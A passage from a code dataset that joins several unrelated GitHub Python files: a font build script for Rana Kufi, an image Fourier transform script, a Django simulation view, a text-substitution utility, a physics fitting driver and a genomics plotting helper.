17,\n 936: 18,\n 949: 19,\n 950: 20,\n 1361: 21,\n # 22-28: Reserved for Alternate ANSI and OEM\n # 29: Macintosh Character Set (US Roman)\n # 30: OEM Character Set\n # 31: Symbol Character Set\n # 32-47: Reserved for OEM\n 869: 48,\n 866: 49,\n 865: 50,\n 864: 51,\n 863: 52,\n 862: 53,\n 861: 54,\n 860: 55,\n 857: 56,\n 855: 57,\n 852: 58,\n 775: 59,\n 737: 60,\n 708: 61,\n 850: 62,\n 437: 63,\n}\n\n\ndef draw(layer, instance, pen=None):\n font = layer.parent.parent\n width = layer.width\n if pen is None:\n pen = T2CharStringPen(width, None)\n pen = PointToSegmentPen(pen)\n\n for path in layer.paths:\n nodes = list(path.nodes)\n\n pen.beginPath()\n if nodes:\n if not path.closed:\n node = nodes.pop(0)\n assert node.type == \"line\", \"Open path starts with off-curve points\"\n pen.addPoint(tuple(node.position), segmentType=\"move\")\n else:\n # In Glyphs.app, the starting node of a closed contour is always\n # stored at the end of the nodes list.\n nodes.insert(0, nodes.pop())\n for node in nodes:\n node_type = node.type\n if node_type not in [\"line\", \"curve\", \"qcurve\"]:\n node_type = None\n pen.addPoint(\n tuple(node.position), segmentType=node_type, smooth=node.smooth\n )\n pen.endPath()\n\n for component in layer.components:\n componentLayer = getLayer(component.component, instance)\n transform = component.transform.value\n componentPen = pen.pen\n if transform != DEFAULT_TRANSFORM:\n componentPen = TransformPen(pen.pen, transform)\n xx, xy, yx, yy = transform[:4]\n if xx * yy - xy * yx < 0:\n componentPen = ReverseContourPen(componentPen)\n draw(componentLayer, instance, componentPen)\n\n return pen.pen\n\n\ndef makeKerning(font, master, glyphOrder):\n fea = \"\"\n\n groups = {}\n for name in glyphOrder:\n glyph = font.glyphs[name]\n if not glyph.export:\n continue\n if glyph.leftKerningGroup:\n group = f\"@MMK_R_{glyph.leftKerningGroup}\"\n if group not in groups:\n groups[group] = []\n groups[group].append(name)\n if glyph.rightKerningGroup:\n group = f\"@MMK_L_{glyph.rightKerningGroup}\"\n if group not in groups:\n groups[group] = []\n groups[group].append(name)\n for group, glyphs in groups.items():\n fea += f\"{group} = [{' '.join(glyphs)}];\\n\"\n\n kerning = font.kerningRTL[master.id]\n pairs = \"\"\n classes = \"\"\n enums = \"\"\n for left in kerning:\n if left in font.glyphs and not font.glyphs[left].export:\n continue\n for right in kerning[left]:\n if right in font.glyphs and not font.glyphs[right].export:\n continue\n value = kerning[left][right]\n kern = f\"<{value} 0 {value} 0>\"\n if left.startswith(\"@\") and right.startswith(\"@\"):\n if value:\n classes += f\"pos {left} {right} {kern};\\n\"\n elif left.startswith(\"@\") or right.startswith(\"@\"):\n enums += f\"enum pos {left} {right} {kern};\\n\"\n else:\n pairs += f\"pos {left} {right} {kern};\\n\"\n\n fea += f\"\"\"\nlookupflag IgnoreMarks;\n{pairs}\n{enums}\n{classes}\n\"\"\"\n\n return fea\n\n\ndef getLayer(glyph, instance):\n for layer in glyph.layers:\n if layer.name == instance.name:\n return layer\n return glyph.layers[0]\n\n\ndef makeAutoFeatures(instance, glyphOrder):\n font = instance.parent\n\n markClass = \"\"\n mark = \"\"\n curs = \"lookupflag IgnoreMarks RightToLeft;\\n\"\n liga = \"\"\n\n exit = {}\n entry = {}\n lig = {}\n\n for gname in glyphOrder:\n glyph = font.glyphs[gname]\n if not glyph.export:\n continue\n\n layer = getLayer(glyph, instance)\n for anchor in layer.anchors:\n name = anchor.name\n x = round(anchor.position.x)\n y = round(anchor.position.y)\n if name.startswith(\"_\"):\n markClass += f\"markClass {gname} @mark_{name[1:]};\\n\"\n elif name.startswith(\"caret_\"):\n pass\n elif \"_\" in name:\n name, index = name.split(\"_\")\n if gname not in lig:\n lig[gname] = {}\n if index not in lig[gname]:\n lig[gname][index] = []\n lig[gname][index].append((name, (x, y)))\n elif name == \"exit\":\n exit[gname] = (x, y)\n elif name == \"entry\":\n entry[gname] = (x, y)\n else:\n mark += f\"pos base {gname} mark @mark_{name};\\n\"\n\n for name, components in lig.items():\n mark += f\"pos ligature {name}\"\n for component, anchors in components.items():\n if component != \"1\":\n mark += \" ligComponent\"\n for anchor, (x, y) in anchors:\n mark += f\" mark @mark_{anchor}\"\n mark += \";\\n\"\n\n for name in glyphOrder:\n if name in exit or name in entry:\n pos1 = entry.get(name)\n pos2 = exit.get(name)\n anchor1 = pos1 and f\"{pos1[0]} {pos1[1]}\" or \"NULL\"\n anchor2 = pos2 and f\"{pos2[0]} {pos2[1]}\" or \"NULL\"\n curs += f\"pos cursive {name} ;\\n\"\n\n return curs, markClass + mark\n\n\ndef makeCvFeatures(font, glyphOrder):\n fea = \"\"\n features = {}\n for name in glyphOrder:\n glyph = font.glyphs[name]\n if name.count(\".\") >= 2:\n base, feature, index = name.rsplit(\".\", 2)\n try:\n feature = int(feature)\n index = int(index)\n except ValueError:\n continue\n tag = f\"cv{feature:02d}\"\n if tag not in features:\n features[tag] = {}\n if base not in features[tag]:\n features[tag][base] = []\n features[tag][base].append(name)\n\n for feature, subs in features.items():\n fea += f\"feature {feature} {{\\n\"\n for base, alts in subs.items():\n fea += f\"sub {base} from [{' '.join(alts)}];\\n\"\n fea += f\"}} {feature};\\n\"\n\n return fea\n\n\nRE_DELIM = re.compile(r\"(?:/(.*?.)/)\")\n\n\ndef makeFeatures(instance, master, opts, glyphOrder):\n font = instance.parent\n\n def repl(match):\n regex = re.compile(match.group(1))\n return \" \".join(n for n in glyphOrder if regex.match(n))\n\n for x in list(font.featurePrefixes) + list(font.classes) + list(font.features):\n x.code = RE_DELIM.sub(repl, x.code)\n\n fea = \"\"\n for gclass in font.classes:\n if gclass.disabled:\n continue\n if not gclass.code and gclass.name == \"AllLetters\":\n glyphs = [n for n in glyphOrder if getGlyphInfo(n).category == \"Letter\"]\n gclass.code = \" \".join(glyphs)\n fea += f\"@{gclass.name} = [{gclass.code}];\\n\"\n\n for prefix in font.featurePrefixes:\n if prefix.disabled:\n continue\n fea += prefix.code + \"\\n\"\n\n curs, mark = makeAutoFeatures(instance, glyphOrder)\n kern = makeKerning(font, master, glyphOrder)\n cvxx = makeCvFeatures(font, glyphOrder)\n\n marker = \"# Automatic Code\"\n\n for feature in font.features:\n if feature.disabled:\n continue\n if feature.name == \"mark\":\n feature.code = feature.code.replace(marker, mark)\n if feature.name == \"curs\":\n feature.code = feature.code.replace(marker, curs)\n if feature.name == \"kern\":\n feature.code = feature.code.replace(marker, kern)\n if feature.name == \"dist\":\n fea += cvxx\n\n fea += f\"\"\"\n feature {feature.name} {{\n {feature.code}\n }} {feature.name};\n \"\"\"\n\n marks = set()\n carets = \"\"\n for name in glyphOrder:\n glyph = font.glyphs[name]\n if not glyph.export:\n continue\n\n if glyph.category and glyph.subCategory:\n if glyph.category == \"Mark\" and glyph.subCategory == \"Nonspacing\":\n marks.add(name)\n else:\n layer = getLayer(glyph, instance)\n caret = \"\"\n for anchor in layer.anchors:\n if anchor.name.startswith(\"_\"):\n marks.add(name)\n elif anchor.name.startswith(\"caret_\"):\n _, index = anchor.name.split(\"_\")\n if not caret:\n caret = f\"LigatureCaretByPos {name}\"\n caret += f\" {anchor.position.x}\"\n if caret:\n carets += f\"{caret};\\n\"\n\n fea += f\"\"\"\n@MARK = [{\" \".join(sorted(marks))}];\ntable GDEF {{\n GlyphClassDef , , @MARK, ;\n{carets}\n}} GDEF;\n\"\"\"\n\n if opts.debug:\n with open(f\"{instance.fontName}.fea\", \"w\") as f:\n f.write(fea)\n return fea\n\n\ndef calcFsSelection(instance):\n font = instance.parent\n fsSelection = 0\n if font.customParameters[\"Use Typo Metrics\"]:\n fsSelection |= 1 << 7\n if instance.isItalic:\n fsSelection |= 1 << 1\n if instance.isBold:\n fsSelection |= 1 << 5\n if not (instance.isItalic or instance.isBold):\n fsSelection |= 1 << 6\n\n return fsSelection\n\n\ndef calcBits(bits, start, end):\n b = 0\n for i in reversed(range(start, end)):\n b = b << 1\n if i in bits:\n b = b | 0x1\n return b\n\n\ndef get_property(font, key):\n for prop in font.properties:\n if key == prop.key:\n return prop.defaultValue\n return None\n\n\ndef build(instance, opts, glyphOrder):\n font = instance.parent\n master = font.masters[0]\n\n advanceWidths = {}\n characterMap = {}\n charStrings = {}\n colorLayers = {}\n for name in glyphOrder:\n glyph = font.glyphs[name]\n if not glyph.export:\n continue\n for layer in glyph.layers:\n if \"colorPalette\" in layer.attributes:\n index = layer.attributes[\"colorPalette\"]\n if name not in colorLayers:\n colorLayers[name] = []\n if layer.layerId == layer.associatedMasterId: # master layer\n colorLayers[name].append((name, int(index)))\n else:\n assert False, \"can’t handle non-master color layers\"\n\n if glyph.unicode:\n characterMap[int(glyph.unicode, 16)] = name\n\n layer = getLayer(glyph, instance)\n charStrings[name] = draw(layer, instance).getCharString()\n advanceWidths[name] = layer.width\n\n # XXX\n glyphOrder.pop(glyphOrder.index(\".notdef\"))\n glyphOrder.pop(glyphOrder.index(\"space\"))\n glyphOrder.insert(0, \".notdef\")\n glyphOrder.insert(1, \"space\")\n\n version = float(opts.version)\n\n vendor = get_property(font, \"vendorID\")\n names = {\n \"copyright\": font.copyright,\n \"familyName\": instance.familyName,\n \"styleName\": instance.name,\n \"uniqueFontIdentifier\": f\"{version:.03f};{vendor};{instance.fontName}\",\n \"fullName\": instance.fullName,\n \"version\": f\"Version {version:.03f}\",\n \"psName\": instance.fontName,\n \"manufacturer\": font.manufacturer,\n \"designer\": font.designer,\n \"vendorURL\": font.manufacturerURL,\n \"designerURL\": font.designerURL,\n \"licenseDescription\": get_property(font, \"licenses\"),\n \"licenseInfoURL\": get_property(font, \"licenseURL\"),\n \"sampleText\": get_property(font, \"sampleTexts\"),\n }\n\n fb = FontBuilder(font.upm, isTTF=False)\n date = font.date.replace(tzinfo=datetime.timezone.utc)\n stat = opts.glyphs.stat()\n fb.updateHead(\n fontRevision=version,\n created=int(date.timestamp()) - mac_epoch_diff,\n modified=int(stat.st_mtime) - mac_epoch_diff,\n )\n fb.setupGlyphOrder(glyphOrder)\n fb.setupCharacterMap(characterMap)\n fb.setupNameTable(names, mac=False)\n fb.setupHorizontalHeader(\n ascent=master.ascender,\n descent=master.descender,\n lineGap=master.customParameters[\"hheaLineGap\"],\n )\n\n if opts.debug:\n fb.setupCFF(names[\"psName\"], {}, charStrings, {})\n fb.font[\"CFF \"].compile(fb.font)\n else:\n fb.setupCFF2(charStrings)\n\n metrics = {}\n for name, width in advanceWidths.items():\n bounds = charStrings[name].calcBounds(None) or [0]\n metrics[name] = (width, bounds[0])\n fb.setupHorizontalMetrics(metrics)\n\n fb.setupPost(\n underlinePosition=master.customParameters[\"underlinePosition\"],\n underlineThickness=master.customParameters[\"underlineThickness\"],\n )\n\n # Compile to get font bbox\n fb.font[\"head\"].compile(fb.font)\n\n codePages = [CODEPAGE_RANGES[v] for v in font.customParameters[\"codePageRanges\"]]\n fb.setupOS2(\n version=4,\n sTypoAscender=master.ascender,\n sTypoDescender=master.descender,\n sTypoLineGap=master.customParameters[\"typoLineGap\"],\n usWinAscent=fb.font[\"head\"].yMax,\n usWinDescent=-fb.font[\"head\"].yMin,\n sxHeight=master.xHeight,\n sCapHeight=master.capHeight,\n achVendID=vendor,\n fsType=calcBits(font.customParameters[\"fsType\"], 0, 16),\n fsSelection=calcFsSelection(instance),\n ulUnicodeRange1=calcBits(font.customParameters[\"unicodeRanges\"], 0, 32),\n ulCodePageRange1=calcBits(codePages, 0, 32),\n )\n\n fea = makeFeatures(instance, master, opts, glyphOrder)\n fb.addOpenTypeFeatures(fea)\n\n palettes = master.customParameters[\"Color Palettes\"]\n palettes = [[tuple(v / 255 for v in c) for c in p] for p in palettes]\n fb.setupCPAL(palettes)\n fb.setupCOLR(colorLayers)\n\n instance.font = fb.font\n if opts.debug:\n fb.font.save(f\"{instance.fontName}.otf\")\n\n return fb.font\n\n\ndef buildVF(opts):\n font = GSFont(opts.glyphs)\n glyphOrder = buildAltGlyphs(font)\n prepare(font)\n\n for instance in font.instances:\n print(f\" MASTER {instance.name}\")\n build(instance, opts, glyphOrder)\n if instance.name == \"Regular\":\n regular = instance\n\n ds = DesignSpaceDocument()\n\n for i, axisDef in enumerate(font.axes):\n axis = ds.newAxisDescriptor()\n axis.tag = axisDef.axisTag\n axis.name = axisDef.name\n axis.maximum = max(x.axes[i] for x in font.instances)\n axis.minimum = min(x.axes[i] for x in font.instances)\n axis.default = regular.axes[i]\n ds.addAxis(axis)\n\n for instance in font.instances:\n source = ds.newSourceDescriptor()\n source.font = instance.font\n source.familyName = instance.familyName\n source.styleName = instance.name\n source.name = instance.fullName\n source.location = {a.name: instance.axes[i] for i, a in enumerate(ds.axes)}\n ds.addSource(source)\n\n print(f\" MERGE {font.familyName}\")\n otf, _, _ = merge(ds)\n subroutinize(otf)\n if not opts.debug:\n otf[\"post\"].formatType = 3.0\n return otf\n\n\ndef propagateAnchors(layer):\n for component in layer.components:\n clayer = component.layer or component.component.layers[0]\n propagateAnchors(clayer)\n for anchor in clayer.anchors:\n names = [a.name for a in layer.anchors]\n name = anchor.name\n if name.startswith(\"_\") or name in names:\n continue\n if name in (\"entry\", \"exit\"):\n continue\n x, y = anchor.position.x, anchor.position.y\n if component.transform != DEFAULT_TRANSFORM:\n t = Transform(*component.transform.value)\n x, y = t.transformPoint((x, y))\n new = GSAnchor(name)\n new.position.x, new.position.y = (x, y)\n layer.anchors[name] = new\n\n\ndef prepare(font):\n for glyph in font.glyphs:\n if not glyph.export:\n continue\n for layer in glyph.layers:\n propagateAnchors(layer)\n\n\ndef buildAltGlyph(glyph, alternates, componentName):\n glyphs = []\n for alternate in alternates:\n newGlyph = GSGlyph()\n name = glyph.name\n if name.endswith(\".00\"):\n newGlyph.name = name.rsplit(\".\", 1)[0]\n else:\n newGlyph.name = f\"{name}.01\"\n for attr in {\n \"category\",\n \"subCategory\",\n \"script\",\n \"leftKerningGroup\",\n \"rightKerningGroup\",\n }:\n setattr(newGlyph, attr, getattr(glyph, attr))\n\n for layer in glyph.layers:\n newLayer = GSLayer()\n for attr in {\"name\", \"width\", \"associatedMasterId\"}:\n setattr(newLayer, attr, getattr(layer, attr))\n newLayer.anchors.setter([copy.copy(a) for a in layer.anchors])\n newLayer.components.setter([copy.copy(c) for c in layer.components])\n for component in newLayer.components:\n if component.componentName == componentName:\n component.componentName = alternate\n newLayer.paths.setter([copy.copy(p) for p in layer.paths])\n newGlyph.layers.append(newLayer)\n glyphs.append(newGlyph)\n return glyphs\n\n\ndef updateKerning(font, glyph, alternates):\n for layer in glyph.layers:\n kerning = font.kerningRTL[layer.associatedMasterId]\n for component in layer.components:\n if component.componentName in alternates:\n for left in list(kerning):\n if left == component.componentName:\n assert False # XXX\n for right in list(kerning[left]):\n if right == component.componentName:\n kerning[left][glyph.name] = kerning[left][right]\n\n\ndef buildAltGlyphs(font):\n glyphOrder = [g.name for g in font.glyphs]\n newOrder = []\n alts = {}\n for name in glyphOrder:\n if name.startswith(\"-\") and not \".\" in name:\n alts[name] = [n for n in glyphOrder if n.startswith(name + \".\")]\n\n for name in glyphOrder:\n glyph = font.glyphs[name]\n if not glyph.export:\n continue\n newOrder.append(name)\n counter = 1\n for component in glyph.layers[0].components:\n if component.componentName in alts:\n alternates = alts[component.componentName]\n glyphs = buildAltGlyph(glyph, alternates, component.componentName)\n for newGlyph in glyphs:\n newGlyph.name += f\".{counter:02}\"\n counter += 1\n font.glyphs.append(newGlyph)\n updateKerning(font, newGlyph, alternates)\n newOrder.append(newGlyph.name)\n return newOrder\n\n\ndef main():\n from pathlib import Path\n\n parser = argparse.ArgumentParser(description=\"Build Rana Kufi.\")\n parser.add_argument(\"glyphs\", help=\"input Glyphs source file\", type=Path)\n parser.add_argument(\"version\", help=\"font version\")\n parser.add_argument(\"otf\", help=\"output OTF file\", type=Path)\n parser.add_argument(\"--debug\", help=\"Save debug files\", action=\"store_true\")\n args = parser.parse_args()\n\n otf = buildVF(args)\n otf.save(args.otf)\n\n\nmain()\n","repo_name":"aliftype/rana-kufi","sub_path":"scripts/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":20499,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"94"} +{"seq_id":"29737228835","text":"# the simple 2DFT is for the 2*2 image\n# with 4 fourier bases\n# and 4 fourier coefficients\nfrom PIL import Image, ImageDraw\nimport numpy as np \n\ndef count_energy(pixel):\n\tr = pixel.real\n\ti = pixel.imag\n\n\treturn r\n\n\ndef real_filter(pixel, coeff):\n\tresult = complex(pixel.real * coeff, pixel.imag * coeff)\n\n\treturn result\n\ndef F(u, v, float_M, float_N):\n\tresult = 0.0\n\n\tfor x in range(M):\n\t\tfor y in range(N):\n\t\t\tangle = 2 * np.pi * (u * x / float_M + v * y / float_N)\n\t\t\te_part = np.exp(-1j * angle)\n\t\t\t#e_part = complex(np.cos(angle), np.sin(angle))\n\t\t\tresult += data[x, y] * e_part\n\n\treturn result\n\ndef f(u, v):\n\tresult = data[u, v]\n\tresult = (-1)**(u + v) * result\n\n\treturn result\n\n# get the image's information\t\nimage_name = 'sample2'\nimage_type = '.bmp'\nim = Image.open(image_name + image_type)\ndata = im.load()\nM, N = im.size\nfloat_M = round(M, 4)\nfloat_N = round(N, 4)\npixel = [[0.0 for i in range(N)] for j in range(M)]\n\n# multiply the input image by (-1)**(x+y) to center the transform for filtering\nfor u in range(M):\n\tfor v in range(N):\n\t\tpixel[u][v] = f(u, v)\n\n# do the fourier transform for the pixel in (u, v)\nfor u in range(M):\n\tfor v in range(N):\n\t\tpixel[u][v] = F(u, v, float_M, float_N)\n\ncoeff = 0.9\n\n# Multiply the resulting (complex) array by a real filter function \nfor u in range(M):\n\tfor v in range(N):\n\t\tpixel[u][v] = real_filter(pixel[u][v], coeff)\n\nresultImage = Image.new('L',(M, N), 'white')\ndraw = ImageDraw.Draw(resultImage)\n\nfor i in range(M):\n\tfor j in range(N):\n\t\t\tdraw.point((i, j), count_energy(pixel[i][j]))\n\n#save the output files\nresultImage.save(image_name + '_result_b.bmp', format='BMP')\n","repo_name":"FionaT/Digital-Image-Processing_Proj","sub_path":"proj_4/0401/0401_b.py","file_name":"0401_b.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31981786356","text":"from django.conf import settings\nfrom simulation.simulation import CityMap, DisasterSimulation\nfrom control_room.models import PoliceStation, Hospital, FireStation\nfrom pprint import pprint\nfrom rest_framework.response import Response\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom rest_framework import views\nimport ast\n\n\nclass RunSimulationView(views.APIView):\n\n\n \n\n def get(self, request):\n\n police_stations_coordinates = [[(p.latitude, p.longitude), p.name, p.capacity, p.vehicles_available] for p in PoliceStation.objects.all()]\n hospitals_coordinates = [[(h.latitude, h.longitude), h.name, h.capacity, h.vehicles_available] for h in Hospital.objects.all()]\n firestations_coordinates = [[(f.latitude, f.longitude), f.name, f.capacity, f.vehicles_available] for f in FireStation.objects.all()]\n #http://127.0.0.1:8000/simulation/run?lat=53.338400&long=-6.246793&policecars=2&ambulances=1&firetrucks=0\n try:\n\n pprint(request.query_params)\n policecars = int(request.query_params.get(\"policecars\", 0))\n firetrucks = int(request.query_params.get(\"firetrucks\", 0))\n ambulances = int(request.query_params.get(\"ambulances\", 0))\n lat = float(request.query_params[\"lat\"])\n long = float(request.query_params[\"long\"])\n disaster_coordinates = (lat, long)\n # use this\n city_map = CityMap(settings.G, self.police_stations_coordinates, self.hospitals_coordinates, self.firestations_coordinates)\n sim = DisasterSimulation(city_map, disaster_coordinates)\n data = sim.run(policecars=policecars, firetrucks=firetrucks, ambulances=ambulances)\n # use till here\n response = Response(data)\n except Exception as e:\n response = Response({\"error\": str(e)})\n \n return response\n\n","repo_name":"talhabinijaz576/DisasterResponse","sub_path":"simulation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"30744023210","text":"import re\r\nimport os\r\nimport sys\r\n\r\n\r\nSUBRULES = (\r\n\t(re.compile(\"^1\"), \"\"),\r\n\t(re.compile(\"\\\"\\\"\"), \"\\\"\"),\r\n\t(re.compile(\"(\\S)\\[\"), \"\\g<1> [\"),\r\n\t)\r\n\r\ndef sub(content):\r\n\tfor parser, repl in SUBRULES:\r\n\t\tcontent = parser.sub(repl, content)\r\n\treturn content\r\n\r\ndef main(target):\r\n\tfiles = filter(lambda x: x.endswith(\".txt\"), os.listdir(target))\r\n\tfor filename in files:\r\n\t\twith open(filename, 'r') as f:\r\n\t\t\tcontent = f.read()\r\n\t\twith open(filename, 'w') as f:\r\n\t\t\tf.write(sub(content))\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain(sys.argv[1])","repo_name":"muma378/Utils","sub_path":"utils/substitute.py","file_name":"substitute.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20761202001","text":"import os\nimport sys\nfrom multiprocessing import Pool\nimport amptools_cfg\n\nfit_name = sys.argv[1]\nnbins = int(sys.argv[2]) \nnfits = int(sys.argv[3])\nnprocess = int(sys.argv[4]) \nseed_file = 'param_init.cfg'\ncfg_file_name = 'amptools.cfg'\ndata_dir = fit_name\nbase_directory = os.getcwd()\n\n# setup config file settings\ncfg_file = amptools_cfg.amptools_cfg()\ncfg_file.set_data([runPeriod+'_'+polAngle for runPeriod in ['DATA'] for polAngle in ['000', '045', '090', '135']])\n#cfg_file.set_data([runPeriod+'_'+polAngle for runPeriod in ['sp17', 'sp18', 'fa18'] for polAngle in ['000', '045', '090', '135']])\ncfg_file.set_particles('Beam Proton KShort KLong')\ncfg_file.set_fname(cfg_file_name)\ncfg_file.set_fit_name(fit_name)\ncfg_file.set_amplitudes('sdme')\n#cfg_file.set_pol_info([[1.77, 0.38], [47.85, 0.38], [94.50, 0.38], [138.43, 0.38]])\n# cfg_file.set_include_bkg(False)\n\ndef pwa_setup(nbins, base_directory):\n\tpaths = []\n\n\tfor i in range(nbins):\n\t\tpath = base_directory+'/'+data_dir+'/bin_'+str(i)\n\n\t\tif not os.path.exists(f'{path}/fits_results/'):\n\t\t\tos.mkdir(path+\"/fits_results/\")\n\n\t\tif os.path.exists(f'{path}/nominal.fit'):\n\t\t\tprint(f'removing {path}/nominal.fit')\n\t\t\tos.system(f'rm {path}/nominal.fit')\n\n\t\tif os.path.exists(path+'/fit.log'):\n\t\t\tprint(f'removing {path}/fit.log')\n\t\t\tos.system(f'rm {path}/fit.log')\n\n\t\tif nfits > 1:\n\t\t\tcfg_file.set_parRange(True)\n\n\t\tos.chdir(path)\n\t\tif not os.path.exists(f'{path}/amptools.cfg'):\n\t\t\tcfg_file.set_ext(f'_{i}')\n\t\t\tcfg_file.write_amptools_config()\n\n\t\tpaths.append(path)\n\n\treturn paths\n\ndef run_fit(path):\n\tprint(f'Move to directory {path}')\n\tos.chdir(path)\n\n\tcmd = f'fit -c amptools.cfg -s {seed_file} -r {nfits} > fit.log'\n\tprint(cmd)\n\tos.system(cmd)\n\n\tprint('done fitting in '+path)\n\n\tcmd = f'cp {fit_name}.fit nominal.fit'\n\tos.system(cmd)\n\n\tcmd = f'mv {fit_name}*.fit fits_results/'\n\tos.system(cmd)\n\nif __name__ == '__main__':\n\tpaths = pwa_setup(nbins, base_directory)\n\n\tif nprocess == 1:\n\t\tfor path in paths:\n\t\t\trun_fit(path)\n\telse:\n\t\tp = Pool(nprocess)\n\t\tp.map(run_fit, paths)\n","repo_name":"gabyrod7/ksmisskl_gabyrod_gluex1_PhiSDME","sub_path":"sdme/sdme_scripts/fitsdme.py","file_name":"fitsdme.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"791777048","text":"import pyfaidx \nimport torch\nfrom torch import nn\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport seaborn as sns\nimport math\nimport pandas as pd\n\nimport sys\nsys.path.append('../models')\nfrom Beluga import Beluga\n\n\n\ndef get_data(input_file_path, file_index):\n \"\"\"\n Retrieves data saved by the predict method\n \n Args:\n input_file_path : str\n The path to an input file saved from predict\n \n file_index : int\n The index of the inputs file to be plotted by the plot method\n \n \"\"\"\n data = torch.load(input_file_path)\n \n #Raise exception if multiple input file is provided but an index is not\n if type(data['center_pos']) == list and file_index == None:\n raise Exception(\"If an input file contains multiple predictions, a file index must also be specified\")\n \n \n i = 0 if file_index == None else int(file_index) - 1\n \n \n center_pos = data['center_pos'] if type(data['center_pos']) != list else data['center_pos'][i]\n return data[\"prediction\"][i], data[\"reference\"][i], center_pos, data[\"diff\"]\n \n\n\n\ndef encode_sequence(chrome_num, pos):\n \"\"\"\n Returns a sequence from chromosome chrome_num centered at position pos encoded\n as a 4xlength tensor\n \n Args:\n chrome_num : str\n The chromosome to be sample from (e.g chr11)\n \n position : int\n Center position of the chromosome to be sample from\n \n genome : fasta object\n The genome that sequences are drawn from\n \n length : int\n Length of input sequence\n \n Returns:\n seq_encoded : torch.tensor\n encoded version of the input sequence\n \n\n \"\"\"\n seq = str(genome[chrome_num][pos-1000:pos+1000])\n\n #define the encoding\n encoding_dict = {'A': torch.tensor([1, 0, 0, 0]), 'G': torch.tensor([0, 1, 0, 0]),\n 'C': torch.tensor([0, 0, 1, 0]), 'T': torch.tensor([0, 0, 0, 1]),\n 'N': torch.tensor([0, 0, 0, 0]), 'H': torch.tensor([0, 0, 0, 0]),\n 'a': torch.tensor([1, 0, 0, 0]), 'g': torch.tensor([0, 1, 0, 0]),\n 'c': torch.tensor([0, 0, 1, 0]), 't': torch.tensor([0, 0, 0, 1]),\n 'n': torch.tensor([0, 0, 0, 0]), '-': torch.tensor([0, 0, 0, 0])}\n \n\n \n #create a encoded sequence \n seq_encoded = torch.zeros((4, len(seq)))\n \n \n for i in range(len(seq)):\n seq_encoded[:,i] = encoding_dict[seq[i]]\n\n \n return seq_encoded.unsqueeze(0)\n\n\n\n\ndef plot_letters(axs, motifs, colors, ppr):\n \"\"\"\n Given an axis and array of reference allele indices, plot letters on the heatmap\n \n Args:\n axs : Matplotlib axes\n Axes object to plot on\n \n Motifs : List\n A list of numbers representing the letters to be plotted\n \n Colors : (int,int,int) tuple\n Tuple representing the RGB value of the letter to be plotted\n \n ppr : int\n position-per-row is the number of positions plotted in each row of the output plit\n \n \n \"\"\"\n scaled_font_size = round(12 / (ppr/200),2)\n for i in range(len(colors)):\n color = colors[i]\n\n if motifs[i] == 0:\n axs.text(i + 0.25,0,\"A\", fontsize = scaled_font_size, color = color, fontfamily = \"monospace\", fontweight = \"bold\")\n\n if motifs[i] == 1:\n axs.text(i + 0.25,0,\"G\", fontsize = scaled_font_size, color = color, fontfamily = \"monospace\", fontweight = \"bold\")\n\n if motifs[i] == 2:\n axs.text(i + 0.25,0,\"C\", fontsize = scaled_font_size, color = color, fontfamily = \"monospace\", fontweight = \"bold\")\n\n if motifs[i] == 3:\n axs.text(i + 0.25,0,\"T\", fontsize = scaled_font_size, color = color, fontfamily = \"monospace\", fontweight = \"bold\")\n \n \n \ndef get_colors(array, diff = False):\n \"\"\"\n Return the colors of the letters to be plotted on the graph\n \n Args:\n array : torch.tensor\n array containing the average values of the Multiplexer predictions made from the alternative sequences\n \n diff : bool\n whether the --diff option was used\n \n Returns:\n colors : list\n a list contain tuples of RGB values of colors\n \n \n \"\"\"\n colors = []\n if diff:\n \n minval = torch.abs(array[array < 0]).max().item()*0.5 #abs value of the min\n maxval = array.max().item()\n primary_color = 0.9\n for i in array:\n \n if i < 0:\n if (-1*i.item()) > (maxval): i = torch.tensor(maxval)\n second_color = round(0.9 - (0.9)/(minval)*(torch.abs(i).item()), 2)\n color = (second_color, second_color, primary_color)\n elif i == 0:\n color = (0.9, 0.9, 0.9)\n elif i > 0:\n second_color = round(0.9 - (0.9)/(maxval)*(torch.abs(i).item()), 2)\n color = (primary_color, second_color, second_color)\n \n colors.append(color)\n\n \n else:\n minval = 0\n maxval = torch.abs(array[array < 0]).max().item()*0.5 #max negative value\n for i in array:\n if i < 0:\n if (-1*i.item()) > (maxval): i = torch.tensor(maxval) #all negative values would be set to this\n color = round(0.9 - (0.9)/(maxval - minval)*(torch.abs(i).item() - minval), 2)\n \n else:\n color = 0.9\n \n colors.append( (color, color, color) )\n \n \n return colors\n \n \n \n\ndef create_plot(plot_index, plot_array, letters, colors, x_ticks, figname, target_names = None, ppr = None, figsize = None, output_format = None):\n \"\"\"\n This method creates the plots and saves them as a pdf file\n \n Args:\n plot_arry : torch.tensor\n array to be plotted\n \n letters : list\n list of letters representing the reference allele to be plotted\n \n colors : list\n list of tuples representing the color of letters to be plotted\n \n x_ticks : lsit\n a list of x-axis labels\n \n figname : str\n name of plot\n \n ppr : int\n positions per row\n \n figsize : tuple\n size of plot\n \n output_format : str\n format of output plot (e.g 'pdf')\n \n \n \"\"\"\n #define optional arguments\n ppr = 200 if ppr == None else ppr \n figsize = (50,50) if figsize == None else figsize\n output_format = 'pdf' if output_format == None else output_format\n \n \n \n #calculate plot shapes and sizes\n total_plots = math.ceil(plot_array.shape[0]/ppr)\n remainder = plot_array.shape[0] % ppr #the number of positions to be plotted on the final plot\n \n \n \n min_val = plot_array.min()\n max_val = plot_array.max()\n\n \n fig = plt.figure(figsize = figsize)\n \n fig.subplots_adjust(hspace = 2)\n \n plot_dict = {}\n for i in range(1, total_plots + 1):\n plot_dict[\"ax\" + str(i)] = fig.add_subplot(total_plots,1,i) \n \n\n if remainder > 0:\n filler = torch.zeros((ppr - remainder,4))\n plot_array = 